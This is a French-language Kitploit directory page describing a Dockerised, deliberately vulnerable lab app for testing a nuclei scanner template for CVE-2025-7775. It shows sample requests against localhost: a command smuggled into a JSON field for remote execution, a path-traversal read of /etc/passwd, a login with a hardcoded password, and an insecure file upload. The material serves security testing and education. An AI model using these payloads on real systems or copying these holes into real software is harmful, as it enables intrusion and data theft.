Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-7775-vulnerable-lab — Application web Dockerisée vulnérable exposant RCE, traversée de chemin, identifiants codés en dur et téléchargements de fichiers non sécurisés ; un laboratoire isolé pour tester les modèles de scanners de sécurité. | Kitploit
Outils/GitHubGitHub/aaqilyousuf/cve-2025-7775-vulnerable-lab
Scanners de VulnérabilitésExploitation d'Applications WebCTFTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubaaqilyousuf/cve-2025-7775-vulnerable-lab

CVE-2025-7775-vulnerable-lab

Application web Dockerisée vulnérable exposant RCE, traversée de chemin, identifiants codés en dur et téléchargements de fichiers non sécurisés ; un laboratoire isolé pour tester les modèles de scanners de sécurité.

Voir le dépôt
2il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-7775 Laboratoire Vulnérable

Ce dépôt fournit une configuration vulnérable pour tester le modèle nuclei pour CVE-2025-7775.

Exécution

root@kitploit:~
docker build -t vuln-app .
docker run -d --name vuln-test -p 5000:5000 vuln-app

Tests de vulnérabilité

1. Exécution de commandes à distance (RCE)

root@kitploit:~
curl -X POST http://localhost:5000/api/v1/configuration \
  -H "Content-Type: application/json" \
  -d '{"payload":"ls > /tmp/poc_rce.txt"}'

docker exec -it vuln-test cat /tmp/poc_rce.txt

2. Traversée de chemin

root@kitploit:~
curl "http://localhost:5000/download?file=/etc/passwd"

3. Identifiants codés en dur

root@kitploit:~
curl -X POST http://localhost:5000/api/v1/login \
  -H "Content-Type: application/json" \
  -d '{"username":"admin", "password":"citrix123"}'

4. Téléchargement de fichier non sécurisé

root@kitploit:~
echo "POC FILE UPLOAD" > test.txt
curl -X POST -F "[email protected]" http://localhost:5000/upload
docker exec -it vuln-test cat /tmp/test.txt

Remarques d'utilisation

  • Ceci est un environnement vulnérable simulé à des fins de test uniquement
  • À utiliser uniquement dans des environnements de laboratoire isolés
  • Non destiné à une utilisation en production
  • À des fins éducatives et de recherche en sécurité uniquement

Nettoyage

root@kitploit:~
docker stop vuln-test
docker rm vuln-test
docker rmi vuln-app
Télécharger l’outil